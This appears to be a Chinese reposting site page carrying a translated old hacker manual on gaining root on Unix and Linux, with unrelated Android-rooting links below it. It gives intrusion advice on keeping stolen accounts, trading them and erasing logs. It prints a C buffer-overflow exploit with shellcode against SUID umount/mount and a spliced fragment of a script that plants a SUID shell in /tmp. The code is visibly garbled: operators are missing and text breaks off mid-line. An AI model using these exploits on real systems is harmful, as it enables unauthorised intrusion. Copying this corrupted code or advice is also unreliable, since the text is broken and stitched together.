当前位置:首页 > 实用技巧 >

怎么获得root的权限(自己能不能获取root权限)

来源:原点资讯(m.360kss.com)时间:2023-04-30 01:11:32作者:YD166手机阅读>>

如我前面所说的,大多数情况下,你仅仅需要一个帐号就行了,如果你得不到系统的root,你可能会用它来和IRC迷换取其它帐号或一些对你hacking有帮助的信息.本章有足够的帮助信息让你即使你得不到root帐户,也可留着系统以后再用.你可以把帐号先放一边,把有关信息记录在一些log文档中,并做好备忘录以便以后当有新的可利用漏洞被发现时你可以回忆起来:)

在你确信不会有失去帐号的危险之前不要轻易进入系统。记住:当你用一个帐号Login而又没拿到root时,你就无法清除日志文档(logs),这样该用户下次login时,就会看到这样的信息:

last login from xxx.com time:0:00 date:xx/xx/xx
--------------------------------------------------------------------------------

Bugs(一些漏洞)

不同的程序里都有很多Bug可利用来取得root权限.Bug可能是安装在系统上的一个游戏,或者甚至是sendmail程序.如果他们没有定期升级程序,你可以确信肯定可以入侵(即使现在不行,也是很快就行).

我会在此提供一些主要的Exploit(这个词动词是"利用、使用、开发"的意思",名词其实和bug意思差不多:译注)和Bugs,其它不大常用的则在附录里介绍.我会给你详细的英文条款,让你能取得系统的root权限.但请务必在行动之前先完整阅读完下节和本手册,以确定你以正确方式开始,并且不会搞得在系统里呆得太久.
--------------------------------------------------------------------------------

Exploits(利用漏洞)

Umount/mount Exploit

在/bin目录下寻找名为Umount(或mount)的文件,如果你找不到,用下面的命令搜索:

find / -name umount -print -dev

(你可用同样的方式寻找任何文件)

进入该文件所在目录并且:ls -al um*

如果文件有SUID"s"标志,你就可能拿到root.

SUID "s"使文件属主(这里是root)有rws权限。你要寻找的就是这个"s".

看这儿:

victim:/bin# ls -al um*

-rwsr-sr-x   1 root         8888 Mar 21  1995 umount

victim:/bin#

 

通过编译下面的文件我们就可以拿到此机器的root.

umount.c
------ cut here

/* sno.c : Linux realpath exploit
 * Syntax: ./sno N
 *         mount $WOOT
 *    OR  umount $WOOT
 * N is some number which seems to differ between 4 & 8, if your number is
 * too big, you will get a mount error, if it is too small, it will seg
 * fault.  Figure it out.  (Sometimes N=0 for mount)
 * If you use mount, first thing to do once you get the root shell is rm
 * /etc/mtab~, if this file exists you can't root with mount until it is
 * removed.
 *
 *
 *                                          -ReDragon
 */
#define SIZE 1024

   long get_esp(void)
   {
   __asm__("movl %esp,?x\n");
   }

   main(int argc, char **argv)
   {
   char env[SIZE 4 1]; /* 1024 buffer 4 byte return address null byte */
   int a,r;
   char *ptr;
   long *addr_ptr;
   char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
   char *exec_ptr = execshell;

   r=atoi(argv[1]);
   ptr = env;
   memcpy(ptr,"WOOT=",5); /* set environment variable to use */
   ptr = 5;

   for(a=0;a<SIZE 4-strlen(execshell)-r;a )  /* pad front with NOPs */
      *(ptr ) = 0x90;
   while (*exec_ptr)
      *(ptr ) = *(exec_ptr );
   addr_ptr = (long *)ptr;
   *(addr_ptr ) = get_esp() 1139;  /* 0xbffffc01 */

   ptr = (char *) addr_ptr;
   *ptr = 0; /* must end with null byte to terminate string */
   putenv(env);
   system("/bin/mount $WOOT");
}

----------- cut he_leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
cd /tmp
sh
------------ cut here


用chmod为文档加上运行权限( x):

chmod x sm.sh

然后:

1.运行此文件

2.它把你带到/tmp目录中

3.输入ls -al 看在那里是否有SUID sh 文件。如果有,用whoami看自己是否是root,如果是的话,就运行./sh文件,这回你可看一看你是不是root了;)

我会在附录里放更多的脚本程序,但目前这是取得linux和BSD上的root权限的最好方法。如果你需要其它的BSD里的exploit(可利用漏洞),可试一试附录里的crontab exploit for BSD。

栏目热文

x8找不到root权限(x8沙箱的root权限管理在哪)

x8找不到root权限(x8沙箱的root权限管理在哪)

所以就打开之后出现闪退的情况。在电脑上下载应用宝软件。把手机连接电脑后进行操作就可以了。用上kingroot就能让手机获...

2023-04-30 01:08:10查看全文 >>

一加手机自带root权限(一加手机开root权限)

一加手机自带root权限(一加手机开root权限)

手机Root一直是机圈里极客的家常便饭,而随着手机Root门槛的越来越低,网上也有了不少一键Root的软件,普通消费者是...

2023-04-30 01:41:12查看全文 >>

oppor15如何超级截屏(oppor15手机怎么截屏最简单的方法)

oppor15如何超级截屏(oppor15手机怎么截屏最简单的方法)

手机如今不仅仅满足于通话,分享有趣的内容也是经常的事,使用手机截图功能必不可少。为了不断完善用户的体验感,更为方便的截图...

2023-04-30 01:37:15查看全文 >>

oppor15截屏的方法有几种(oppor15怎样超长截屏)

oppor15截屏的方法有几种(oppor15怎样超长截屏)

oppor15星云版怎么截图?oppor15星云版已经发布上市了,很多人还不知道这款手机怎么截图,其实它的截图方式跟其他...

2023-04-30 00:52:01查看全文 >>

oppor15部分截屏怎么弄(oppor15怎么开启长图截屏)

oppor15部分截屏怎么弄(oppor15怎么开启长图截屏)

在生活中常用到的小功能莫过于截屏吧~截屏可以保存,也可以帮助与分享ColorOS升级后,截屏的方法也越来越多,今天我们就...

2023-04-30 01:16:47查看全文 >>

一键root精灵(一键root精灵下载免费版)

一键root精灵(一键root精灵下载免费版)

方案1:第三方软件清除  第三方软件依然是利用刷机精灵这类型软件里面带的清除密码功能,不过这个有个限制,第一是要平板电脑...

2023-04-30 01:15:59查看全文 >>

获取root权限最新方法(三分钟教你获得root权限)

获取root权限最新方法(三分钟教你获得root权限)

要想获取root权限,通常是先安装twrp等第三方recovery,然后通过recovery安装magisk.但有些手机...

2023-04-30 01:28:32查看全文 >>

安卓9一键root(安卓9root工具)

安卓9一键root(安卓9root工具)

安卓版本每年更新换代,想要root权限越来越困难,如今市面上的root工具已经形同虚设无法获取root权限了。目前还有一...

2023-04-30 01:31:41查看全文 >>

手机root后有什么好处和坏处(手机root后怎么恢复)

手机root后有什么好处和坏处(手机root后怎么恢复)

root在手机中指的是Android系统的最高权限,手机root之后,用户可以获得Android系统中超级用户权限。有了...

2023-04-30 00:57:31查看全文 >>

乐视电视一键root

乐视电视一键root

本ROM基于官方6.5.072S,由智能电视网wxlzhp(elite)制作,应多位网友要求制成,感谢多位网友的测试,转...

2023-04-30 01:11:54查看全文 >>

文档排行